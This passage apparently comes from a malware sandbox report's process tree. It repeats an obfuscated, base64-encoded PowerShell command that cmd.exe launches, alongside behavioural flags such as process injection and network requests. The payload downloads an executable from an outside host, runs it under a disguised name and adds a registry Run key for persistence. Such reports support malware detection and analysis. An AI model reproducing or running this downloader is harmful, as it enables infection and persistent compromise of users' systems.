QQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:560
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAA